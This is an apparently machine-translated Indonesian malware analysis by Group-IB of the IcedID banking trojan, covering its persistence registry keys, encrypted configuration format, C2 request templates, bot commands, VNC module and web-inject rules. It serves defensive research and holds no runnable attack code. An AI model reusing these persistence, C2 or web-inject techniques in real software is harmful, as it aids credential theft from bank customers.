Pewaris Zeus: mengapa Trojan IcedID berbahaya bagi nasabah bank

Pakar Group-IB menganalisis Trojan yang menyerang pelanggan bank AS dan menyediakan bagi publik hasil analisis mendalam dari format data konfigurasi dinamis dengan skrip Python dan informasi di server CnC.


Pada November 2017, tim peneliti dari IBM X-Force menerbitkan laporan tentang trojan baru - IcedID , yang ditujukan terutama untuk pelanggan bank AS. Bot memiliki banyak fitur malware Zeus yang terkenal, termasuk: mengunduh dan menjalankan modul, mengumpulkan dan mengirimkan data otentikasi ke server, informasi tentang perangkat yang terinfeksi, dan melakukan serangan man-in-the-browser (MITB). Terlepas dari kenyataan bahwa dalam fungsinya Trojan baru ternyata mirip dengan bankir populer lainnya - Trickbot, GOZI, Dridex, yang secara aktif menyerang pelanggan bank, IcedID menggunakan format biner non-standar untuk menyimpan data konfigurasi. Fitur lain yang membedakan malware ini adalah kemampuan untuk menyebarkan server proxy secara langsung pada mesin yang terinfeksi untuk melakukan serangan MITB.

Teks: Ivan Pisarev, Spesialis Analisis Malware Grup-IB

Segera, IcedID tidak begitu luas dibandingkan dengan trojan lain, tetapi sekarang ia memiliki fungsionalitas yang cukup untuk mencapai tujuannya, di mana pencurian kredensial korban adalah yang utama. Ini dapat dicapai dengan banyak cara, mulai dari pencurian file dan entri registri dangkal dari komputer yang terinfeksi, dan diakhiri dengan mencegat dan mengubah lalu lintas peramban yang dienkripsi (serangan manusia-dalam-peramban).

Dalam kasus IcedID, data dicuri dari akun: Windows Live Mail, Windows Mail, RimArts, Poco Systems Inc, IncrediMail, The Bat! dan Outlook. Serangan MITB dilakukan dengan menggunakan server proxy, yang mengambil trojan pada perangkat yang terinfeksi, sehingga melewati semua lalu lintas jaringan melalui dirinya sendiri dan memodifikasinya. IcedID juga memiliki modul pemrosesan perintah server yang memungkinkan Anda untuk mengunduh dan menjalankan file dari jarak jauh (misalnya, dalam kasus yang sedang dipelajari, sampel memuat modul VNC, kode program yang memiliki bagian kode yang serupa dengan IcedID).

Menggunakan server proxy untuk MITB adalah perilaku tidak lazim untuk jenis trojan ini. Lebih sering, malware disematkan dalam konteks browser dan dialihkan fungsi panggilan dari perpustakaan standar ke fungsi handler-nya (contoh: WinHttpConnect () , InternetConnect () , InternetReadFile () , WinHttpReadData () , dll.). Sebelumnya, trik proxy sudah digunakan di GootKit .

IcedID didistribusikan menggunakan malware lain, Emotet (saat ini sering digunakan sebagai bootloader, meskipun ia memiliki fungsi lanjutan) dan sudah pada awalnya termasuk daftar luas metode modern untuk mencuri data pengguna.

Sekarang trojan memiliki mekanisme anti-parsing yang agak lemah (enkripsi string, korup header) dan tidak memiliki metode pendeteksi-VM. Dari sudut pandang peneliti, malware masih dalam pengembangan dan mekanisme perlindungan ini akan ditambahkan kemudian.

Sistem intelijen siber Ancaman Kelompok-IB tidak mendeteksi penjualan IcedID di forum tematik, yang berarti munculnya kelompok baru di arena trojan perbankan atau penjualan trojan melalui saluran pribadi. Tujuan bot, dilihat dari data konfigurasi dinamis (selanjutnya disebut konfigurasi), sebagian besar berlokasi di AS.


Artikel ini mencakup analisis terperinci trojan, analisis mendalam tentang format konfigurasi dinamis dengan skrip Python, dan informasi tentang CnC.

Bagian teknis

Gambaran umum tentang pekerjaan trojan

Awalnya, bagian. Data trojan dienkripsi. Pertama-tama, setelah memulainya, ia mendekripsi bagian sesuai dengan algoritma:


Variabel initial_seed dan size_seed terletak di awal bagian data (8 byte pertama bagian), setelah itu data terenkripsi ukuran ukuran byte ditemukan. Fungsi make_seed () adalah fungsi pseudo random number generator ( PRNG) unik untuk IcedID, yang akan kami kembalikan menjadi lebih dari sekali. Anda dapat menemukan versi fungsi Python di sini .

Awalnya, bot berisi string terenkripsi. Untuk memudahkan analisis, skrip didekodekan untuk IDA Pro untuk mendekripsi string (Anda harus memasukkan alamat fungsi dekripsi dalam sampel Anda).

Langkah selanjutnya adalah menambahkan penangan pengecualian menggunakan fungsi SetUnhandledExceptionFilter () . Jika ada pengecualian terjadi selama operasi aplikasi, itu hanya restart.

Setelah menambahkan penangan pengecualian, trojan mengumpulkan informasi tentang sistem yang terinfeksi:

1. Versi OS
2. Nomor Bangun OS
3. Versi Paket Layanan
4. Kapasitas sistem
5. Jenis OS

Aplikasi ini membuat deskriptor keamanan: D: (A;; GA ;;; WD) (A;; GA ;;; AN) S: (ML;; NW ;;; S-1-16-0) , dan kemudian mengalokasikan memori untuk mencatat informasi selama pengoperasian trojan. Contoh string yang dicatat (string diperoleh menggunakan skrip di IDA):

1. E | C | IN | INS | ISF | CP% u
2. I | C | IN | INT | CI | % u
3. W | C | IN | INT | CI | CRLL

IcedID dapat mengambil beberapa parameter. Diantaranya adalah:

• --svc = - menyimpan string dari parameter ke registri dengan kunci dengan nama IcedID_reg ("* p *") , di mana IcedID_reg (str) adalah fungsi menghasilkan nama kunci dari string str (algoritma untuk membuat nama kunci registri akan dijelaskan nanti), setelah itu trojan mengakses acara dengan nama Global \ <% String karakter acak%> . Jika terjadi kesalahan, bot membuat salinan prosesnya dengan parameter / w = . Jika ini tidak dapat dilakukan, itu menciptakan nilai dalam registri:

HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ <% String dengan panjang 9 dari karakter acak dalam alfabet [az]%>

dengan demikian memastikan kegigihan dalam sistem. Kunci ini dimaksudkan untuk peluncuran awal trojan.

• / u - secara default, malware mencoba menjalankan dirinya sebagai administrator domain (menggunakan program runas ). Jika flag ini ada, trojan tidak melakukan operasi ini dan hanya membuat salinannya di direktori C: \ Users \ <% username%> \ AppData \ Local \ <% String dengan panjang 9 dari karakter acak alfabet [az]%> dengan nama <% Sebuah string dengan panjang 9 dari karakter acak dari alfabet [az]%> .exe , dan menulis path ke file dalam registri, dengan demikian memastikan persistensi dalam sistem.

HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ <% String dengan panjang 9 dari karakter acak dalam alfabet [az]%>

Tampaknya kunci ini digunakan saat memperbarui bankir. Sebelum memulai kembali Trojan "tertidur" selama 5 detik.

• / c - sebelum menjalankan fungsi jahat, Trojan "tertidur" selama 5 detik
• / w = - menyimpan string dari parameter ke registri dengan kunci dengan nama IcedID_reg ("* p *")

Setelah memproses parameter, aplikasi mengakses registri dan mengeluarkan data konfigurasi dinamis yang berisi alamat CnC, serta suntikan Web. Format untuk menyimpan data dalam registri dijelaskan di bagian berikut.

Setelah mengakses registri, program membuat utas yang, setiap 5 atau 10 menit sekali (tergantung pada bendera internal), menghubungi CnC untuk menerima perintah. Di sini perlu dicatat mekanisme non-standar "tertidur" dari bot antara panggilan ke CnC: para pengembang tidak menggunakan fungsi Sleep () standar, sebaliknya mereka membuat acara dalam keadaan non-sinyal dan tanpa memanggilnya dalam keadaan sinyal, panggil fungsi WaitForSingleObject () . Fungsi pembuatan aliran panggilan CnC:


Analog fungsi Sleep () di IcedID:


Jangka waktu panjang akses ke server, serta "fungsi tidur" non-standar kemungkinan besar dirancang untuk menangkal analisis.

SSL digunakan untuk menyembunyikan lalu lintas antara server dan aplikasi.

Setelah memulai utas, bot “memunculkan” server Proxy pada mesin lokal untuk memproses lalu lintas pada mesin yang terinfeksi.

Protokol komunikasi server dan perangkat yang terinfeksi akan dibahas pada bagian berikut. Namun, perlu dicatat bahwa malware atas perintah server dapat memperbarui konfigurasi, memulai dan menghentikan server VNC, menjalankan perintah cmd.exe, mengunduh file.

Interaksi antara IcedID dan CnC Server

Daftar alamat CnC disimpan dalam tubuh bankir dalam bentuk terenkripsi, serta dalam registri dalam bentuk konfigurasi dinamis. Interaksi antara server dan trojan dilakukan menggunakan protokol HTTPS. Mengirim data ke server dengan permintaan POST, menggunakan GET untuk menerima data.

String kueri server adalah sebagai berikut:

<% CnC%> /forum/viewtopic.php?a=<%Integer%>&b=<%Besar integer%> & d = <% Integer%> & e = <% Integer%> & <% Data lain%>>

Nilai Bidang:

• a - jenis permintaan, bidang ini dapat mengambil nilai:
  

  Nilai	Aksi
  0,1	Kirim informasi tentang mesin yang terinfeksi
  2,3	Kirim data lain ke server
  4	Dapatkan versi terbaru dari konfigurasi dinamis dan masukkan ke dalam registri menggunakan kunci dengan nama IcedID_reg ("* cfg1")
  5	Dapatkan versi terbaru dari konfigurasi dinamis dan masukkan ke dalam registri menggunakan kunci dengan nama IcedID_reg ("* cfg0")
  6	Dapatkan versi terbaru dari konfigurasi dinamis dan masukkan ke dalam registri menggunakan kunci dengan nama IcedID_reg ("* rtd") (alamat CnC)
  7	Dapatkan versi terbaru dari modul VNC
  8	Dapatkan versi bot terbaru

• b - ID bot
• d-flag
• e - konstan, terletak langsung di kode bot

Selanjutnya, nilai-nilai bidang tergantung pada bidang "a". Jika 0 atau 1, maka kueri terlihat seperti ini:

POST /forum/viewtopic.php?a=<%0 atau 1%> & b = <% BotID%> & d = <% Integer%> & e = <% Constant%> & f = <% Cfg1 Checksum%> & g = <% Cfg0 Checksum%> & h = <% Rtd Checksum%> & r = <% VNC Checksum%> & i = <% Waktu permintaan%> HTTP / 1.1
Koneksi: tutup
Content-Type: application / x-www-form-urlencoded
Panjang Konten:

Badan permintaan berisi informasi tentang mesin yang terinfeksi. Informasi disediakan dalam bentuk:

k = <% String%> & l = <% String%>% j = <% Integer%> & n = <% Integer%> & m = <% String%>

Dimana:

• k - nama komputer dalam UNICODE
• l - anggota domain di UNICODE
• m - Informasi Sistem:
  
  1. Versi OS
  2. Nomor Bangun OS
  3. Versi Paket Layanan
  4. Kapasitas sistem
  5. Jenis OS

Jika bidangnya 2 atau 3, maka kueri terlihat seperti ini:

POST /forum/viewtopic.php?a=<%3 atau 2%> & b = <% BotID%> & d = <% Integer%> & e = <% Constant%> HTTP / 1.1
Koneksi: tutup
Content-Type: application / octet-stream
Panjang Konten:

Jika tidak, permintaannya adalah sebagai berikut:

DAPATKAN /forum/viewtopic.php?a=<%4-8%>&b=<%BotID%>&d=<%Integer%>&e=<%Constant%>&o=<%Objectum%>
HTTP / 1.1
Koneksi: tutup

Content-Type: application / x-www-form-urlencoded
Panjang Konten:

Contoh pertanyaan disajikan dalam gambar di bawah ini. Paket header saat mengakses server:


Badan pesan:


Trojan dapat menerima perintah dari server. Perintah direpresentasikan sebagai nilai integer. Semua perintah datang ke bot dalam bentuk string, yang parameternya dipisahkan oleh simbol “;”. Program ini dapat memproses 23 perintah:


Jika perintah berhasil dieksekusi, trojan mengirimkan string "Benar" ke server, jika tidak "Salah".

Dalam hal menerima perintah untuk meluncurkan modul perintah lanjutan, aplikasi mengirimkan dua byte ke server, setelah itu menunggu respons. Byte pertama yang diterima dari server sesuai dengan perintah yang diperluas dari tabel:


Server VNC dapat dimulai dengan dua cara yang mungkin (tergantung pada bendera internal):

1. Menggunakan fungsi CreateProcessA () dengan parameter kernel32 rundll32.exe, Sleep -s <% param%>
2. Menggunakan fungsi CreateProcessA () dengan parameter svchost.exe -s <% param%>

di mana <% param%> adalah 16 byte dalam representasi string, diisi sebagai berikut:


Segera setelah memulai, modul VNC memeriksa keberadaan sakelar -s , setelah itu ia membaca parameter yang diteruskan dan memeriksa kondisinya:

paramValue[0] == paramValue[1] ^ (paramValue[3] | (paramValue[2] << 16)) 

dan menggunakan fungsi DuplicateHandle () membuat salinan pegangan soket untuk interaksi lebih lanjut dengan server.

Parameter StartupInfo dari fungsi CreateProcessA () berisi nama Desktop'a yang dibuat khusus: Default <% flag%> . Juga, sebelum pemanggilan fungsi, alamat modul VNC ditempatkan pada parameter ProcessInformation :



Seperti dapat dilihat dari daftar, IcedID memiliki berbagai kemampuan untuk kontrol penuh dari mesin yang terinfeksi. Bahkan jika operator menghadapi masalah kurangnya fungsi, ia hanya akan mengunduh program lain dengan bantuan trojan dan melakukan tugas yang diberikan kepadanya. Misalnya, pada akhir Desember 2017, kami mencatat distribusi TrickBot oleh bankir ini.

Informasi Konfigurasi

Pembuatan nama untuk entri registri

Semua data konfigurasi yang diterima program dari server disimpan dalam registri perangkat yang terinfeksi (kecuali untuk modul VNC, yang disimpan dalam direktori% TEMP% dalam format tmp% 0.8X01.dat ).

Nama kunci registri yang menyimpan data konfigurasi yang menarik bagi kami dihitung menggunakan fungsi berikut:


Seperti yang Anda lihat dari gambar, nama kuncinya adalah nilai hash MD5 dari dua variabel - str dan computerSeed . Jenis data apa yang disimpan dalam variabel registri tergantung pada nilai variabel pertama. Misalnya, dengan nilai variabel * cfg0 atau * cfg1, kunci registri menyimpan suntikan Web, dengan nilai * rtd kunci menyimpan daftar CnC.

computerSeed adalah variabel unik pengguna. Itu dihitung berdasarkan SID pengguna. Script menyediakan versi python dari perhitungan variabel ini.

Path lengkap ke entri konfigurasi dalam registri:

HKEY_CLASSES_ROOT \ CLSID \ <nilai% MD5 dalam format: {% 0.8X-% 0.4X-% 0.4X-% 0.4X-% 0.4X-% 0.4X% 0.8X}%>>

Algoritma yang dijelaskan di atas adalah tepat algoritma untuk menghasilkan nama IcedID_reg () , yang berulang kali disebutkan di atas.

Kami menemukan nilai-nilai string berikut yang terlibat dalam menghasilkan nama-nama registri informasi penting bagi bankir:

• * cfg0 - berisi daftar umum suntikan web
• * cfg1 - berisi daftar alamat dan string untuk sepenuhnya mencuri data halaman
• * rtd - daftar alamat CnC
• * bc * - memberitahukan status modul untuk memproses perintah yang diperluas dari server. Jika entri ini ada di dalam registri - modul sedang berjalan
• * p * - menyimpan parameter startup dengan tombol --svc = dan / w =

Struktur penyimpanan file konfigurasi dinamis

Konfigurasi dinamis disimpan dalam registri dalam bentuk terenkripsi. Server VNC, yang terletak di direktori% TEMP%, dienkripsi dengan cara yang sama.

Dua algoritma digunakan untuk enkripsi data: algoritma Trojan eksklusif dan RC4. Skema algoritma dekripsi:


Mari kita beralih dari teori ke praktik. Data terenkripsi awalnya setelah membaca dari registri:


Setelah menerima data, malware mendekripsi menggunakan algoritma sendiri:


Dan lagi-lagi kita memenuhi fungsi make_seed () !

Setelah dekripsi yang kita miliki (perhatikan alamat - itu didekripsi di bagian memori yang sama):


Setelah dekripsi kedua dalam memori, kita melihat yang berikut:


Setelah data di-unzip dan diuraikan. Perlu dicatat bahwa sebelum membebaskan data, data kembali dienkripsi menggunakan RC4 - perlindungan terhadap analisis dinamis aplikasi.

Struktur data lebih lanjut tergantung pada jenis data konfigurasi. Misalnya, data konfigurasi dengan awalan rtd disimpan dalam format:

 typedef struct CNCStruct { char signedMD5sum[128]; int checksum; BStrings cnc[N]; } CNCStruct; typedef struct BStrings { int length; char str[length]; } BStrings; 

Daftar alamat CnC dalam satu studi:


Sebelum mengakses alamat CnC dari daftar yang diterima, bot memeriksa tanda tangan digital. Kunci publik untuk memverifikasi tanda tangan disimpan di tubuh bot dalam bentuk terenkripsi. Setelah prosedur verifikasi tanda tangan, aplikasi "menimpa" kunci publik, pertama dengan data acak, dan kemudian dengan nol:


Konfigurasi dengan awalan cfg disimpan dalam format:

 typedef struct CfgStruct { int checksum; int elements_count; char config[]; } CfgStruct; 

Dalam kasus yang diteliti, kami melihat data berikut:


Data disimpan dalam format biner yang unik, yang akan dibahas nanti.

Anda dapat melihat algoritme untuk membuat kunci registri dan mendekripsi data konfigurasi dalam skrip .

Algoritma Parsing Data Konfigurasi

Setelah mendekripsi data, program mem-parsing mereka dan menyimpannya dalam bentuk daftar tertaut, yang kemudian berpartisipasi dalam analisis lalu lintas pada perangkat yang terinfeksi (MITB). Pertama-tama, data dibagi menjadi blok-blok yang memiliki struktur:

 typedef struct BaseBlock { int size; char type; char global_flag; char data[size - 6]; } BaseBlock; 

Struktur bidang data tergantung pada jenis bendera. Bendera dalam struktur ini menunjukkan apa yang terjadi ketika string ditemukan di URL / isi permintaan. Bidang dapat mengambil nilai-nilai berikut:

Struktur bidang data jika tipe 0x40 atau 0x41:

 typedef struct ConfigBlock { BStrings patterns[N]; int(0); } ConfigBlock; 

Jika tidak, struktur bidang:

 typedef struct BaseBlock { int typeSizeStr; string urlStr; int flagSize; char flag[flagSize]; int firstOptStrSize; char firstOptStr[firstOptStrSize]; int secondOptStrSize; char secondOptStr[secondOptStrSize]; int thirdOptStrSize; char thirdOptStr[thirdOptStrSize]; } BaseBlock; 

Mari kita lihat lebih dekat pada salah satu blok sampel:


Pertama-tama, perhatikan bidang "Jenis blok konfigurasi" di blok "Informasi umum blok konfigurasi". Ini adalah 0x11, yang berarti bahwa ketika pengguna memuat halaman yang URL-nya termasuk dalam aturan persamaan reguler ^ [^ =] * \ / wcmfd \ / wcmpw \ / CustomerLogin $ , baris <body (argumen kedua) diganti dengan baris < body style = "display: none;" (argumen ketiga).

Dalam memori aplikasi, daftar tertaut dibuat untuk setiap jenis. Algoritma parsing untuk daftar tertaut disajikan pada gambar di bawah ini sebagai layar IDA Pro. Anda dapat melihat skrip Python untuk pars data konfigurasi di sini .

Informasi CnC

Setelah beberapa bulan memantau pengembangan IcedID, kami menemukan banyak domain yang dimasukkan trojan dalam daftar konfigurasi dinamis di bagian CnC. Kami akan mewakili domain dalam bentuk korespondensi (email dari mana pendaftaran terjadi → domain):

Sekarang mari kita melihat lebih dekat pada pengguna yang domainnya telah terdaftar:


Akhirnya, pertimbangkan kronologi mengubah alamat IP domain. Semua alamat IP telah ditambahkan ke tabel sejak November 2017:


Setelah mempelajari data yang disajikan, kita dapat meringkas bahwa semua domain terdaftar untuk surat yang dihasilkan menggunakan layanan surat sementara Lokasi pendaftar fiktif berada di Amerika Serikat, sementara domainnya sendiri berlokasi di Rusia, Ukraina, Belanda, Cina, Kazakhstan, dan Jerman (baru-baru ini ada kecenderungan untuk "memindahkan" domain ke Ukraina dan Jerman). Semua domain berada di zona domain "com" dan "net". Alfabet yang terdiri dari domain hanya mencakup huruf-huruf dari alfabet bahasa Inggris. Di sisi CnC, server Web OpenResty dinaikkan.

Kesimpulan

Meskipun "kuno" Trojan seperti Zeus, relevansinya tidak jatuh. Akibatnya, IcedID muncul di arena trojan yang ditujukan untuk pelanggan bank. Meskipun bankir sudah memiliki daftar peluang yang luas di awal, ia masih meningkatkan: metode membongkar menjadi lebih rumit, dan daftar tujuan berkembang. Kemungkinan besar, di masa depan, program jahat akan memperoleh mekanisme anti-analisis, dan server CnC secara selektif akan memberikan suntikan Web ke perangkat yang terinfeksi. Sementara itu, Trojans tidak memenuhi semua persyaratan "pengguna" mereka, sebagaimana dibuktikan dengan penggunaan TrickBot pada bulan Desember bersama dengan IcedID.

Group-IB tahu segalanya tentang kejahatan dunia maya, tetapi menceritakan hal-hal yang paling menarik.

Saluran Telegram penuh aksi (https://t.me/Group_IB) tentang keamanan informasi, peretas dan serangan dunia maya, peretas dan perompak internet. Investigasi kejahatan dunia maya yang sensasional dengan langkah-langkah, kasus-kasus praktis menggunakan teknologi Grup-IB dan, tentu saja, rekomendasi tentang bagaimana menghindari menjadi korban di Internet.

Grup Saluran YouTube -IB
Group-IB Photowire di Instagram www.instagram.com/group_ib
Twitter berita pendek twitter.com/GroupIB

Group-IB adalah salah satu pengembang solusi terkemuka untuk mendeteksi dan mencegah serangan cyber, mendeteksi penipuan, dan melindungi kekayaan intelektual dalam jaringan yang berkantor pusat di Singapura.